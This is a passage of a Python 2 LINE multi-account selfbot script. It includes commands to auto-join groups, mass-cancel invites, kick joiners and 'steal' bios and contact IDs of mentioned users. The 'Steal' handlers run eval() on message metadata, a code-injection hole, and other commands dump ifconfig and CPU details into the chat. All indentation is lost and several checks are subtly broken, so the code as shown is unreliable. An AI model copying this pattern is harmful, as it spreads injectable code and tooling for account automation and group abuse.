elif msg.text in ["Luffy close qr","Luffy tutup qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro tutup qr","Zorro close qr"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Plak")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji tutup qr","Sanji close qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
elif "Koplaxs" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,Smid)
elif "Luffy" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,mid)
elif "Zorro" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Amid)
elif "Sanji" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Bmid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() in ["gift","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================
#==================================================
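            # "lyric <title>" and "music <title>" query an external joox proxy API
            # (ide.fdlrcn.com, as hard-coded here) and send back the lyrics or the song info,
            # a download link and the audio itself; any exception text is relayed to the chat.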
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
            elif msg.text.lower() == 'kr restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
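            # "Steal bio" reads the MENTION metadata the LINE client attaches to an @-mention;
            # eval() parses that JSON-like string and the first mentioned mid (key "M") is
            # looked up so the target's status message can be echoed back.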
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
#===========================================================
#=======================================================
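            # Translation commands: "T-eng", "T-japan", "T-thai" and "T-id" hand the remaining
            # text to goslate and reply with the translation for the matching language code
            # (en/ja/th/id).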
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
#==========================================================================
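            # "Mode on" is handled by one elif plus a series of independent "if" blocks so a
            # single command flips several switches at once: it closes the group QR link,
            # rejects pending group invites, and turns on the Protectgr, Protectcancl,
            # Protectjoin, protectionOn and qr flags plus the name-lock and invite-block
            # protections.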
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if "Mode on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pname'][msg.to] = cl.getGroup(msg.to).name
if "Mode on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
#==========================================================================
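            # "Mode off" mirrors "Mode on": the stacked blocks below turn the same protections
            # back off and clear the name-lock and invite-block state for this group.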
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if "Mode off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#==========================================================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pname'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#============================================================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
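            # "Steal mid" / "Steal contact": same MENTION-metadata trick as "Steal bio" above;
            # the first mentioned user's mid is sent as plain text or re-shared as a contact
            # message (contentType 13).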
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
